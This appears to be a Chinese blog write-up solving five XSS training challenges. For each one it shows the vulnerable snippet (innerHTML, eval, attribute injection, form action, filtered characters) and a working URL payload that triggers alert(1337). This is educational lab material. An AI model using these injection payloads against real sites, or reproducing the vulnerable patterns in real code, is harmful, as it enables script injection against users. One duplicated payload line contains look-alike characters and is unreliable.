xss 漏洞复现

xss 漏洞复现

一,xss game

1,源码

复制代码
<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>
    spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

题目分析:接收somebody参数放入innerHTML,然后放在

标签展示。innerHTML标签中警用了script标签,所以使用标签。

复制代码
?somebody=<img src=1 onerror="alert(1337)">

2,源码

复制代码
<!-- Challenge -->
<h2 id="maname"></h2>
<script>
    let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
    let ma = ""
    eval(`ma = "Ma name ${jeff}"`)
    setTimeout(_ => {
        maname.innerText = ma
    }, 1000)
</script>

//eval(`ma = "Ma name a";alert(1337);""`)

题目分析:innertext会把<>当成字符串解析,安全系数很高,此题危险方法是eval,进行闭合操作。

复制代码
思路一  ?jeff=a";alert(1337);"
思路二  ?jeff=a"-alert(1337);-"  连接符
       ?jeff=a"-alert(1337);"

3,源码

复制代码
<!-- Challenge -->
<div id="uganda"></div>
<script>
    let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
    wey = wey.replace(/[<>]/g, '')  //过滤了<>
    uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

题目分析:闭合"${wey}"处的双引号,加入我们的方法。

复制代码
?wey=aaa"%20onfocus=alert(1337)%20autofocus="    
autofocus自动对焦
onfocus=alert(1337) 焦点存在时触发函数

4,源码

复制代码
<!-- Challenge -->
<form id="ricardo" method="GET">
    <input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
    ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
    setTimeout(_ => {
        ricardo.submit()
    }, 2000)  //两秒后自动提交
</script>

题目分析:表单的action处也会出现相应的伪协议事件,需要提交触发。

复制代码
?ricardo=javascript:alert(1337)

5,源码

复制代码
<!-- Challenge -->
<h2 id="will"></h2>
<script>
    smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
    smith = smith.replace(/[\(\`\)\\]/g, '') 
    will.innerHTML = smith
</script>

题目分析:过滤了()`\ 双层编码() %2528 %2529 浏览器会转一次。加location识别编码

复制代码
?markassbrownlee=<img%20src=1%20onerror=location="javascript:alert%25281337%2529">

img%20src=1%20οnerrοr=location="javascript:alert%25281337%2529">

复制代码
[外链图片转存中...(img-INiW5cpV-1724041595122)]
相关推荐
打小就很皮...16 小时前
基于 Python + LangChain + RAG 的知识检索系统实战
前端·langchain·embedding·rag
BJ-Giser16 小时前
Cesium 烟雾粒子特效
前端·可视化·cesium
空中海16 小时前
02 ArkTS 语言与工程规范
java·前端·spring
YJlio17 小时前
7.4.5 Windows 11 企业网络连接与网络重置实战:远程访问、本地策略与故障恢复
前端·chrome·windows·python·edge·机器人·django
Slow菜鸟17 小时前
Codex CLI 教程(五)| Skills 安装指南:面向 Java 全栈工程师打造个人 ECC(V1版)
大数据·前端·人工智能
Lee川17 小时前
打字机是怎么炼成的:Chat 流式输出深度解析
前端·后端·面试
前端若水17 小时前
过渡(transition)高级:贝塞尔曲线、硬件加速
前端·css·css3
Lee川17 小时前
Token 无感刷新与 Logout:前端安全会话管理实战
前端·后端·react.js
不会敲代码117 小时前
我写了一个 HTML 文件,把 JS 事件循环彻底搞懂了
前端·javascript·面试
写不来代码的草莓熊17 小时前
SVG 图标插件误读 PNG 图片 + Vite 重启缓存失效重新生成 + 浏览器严格渲染
前端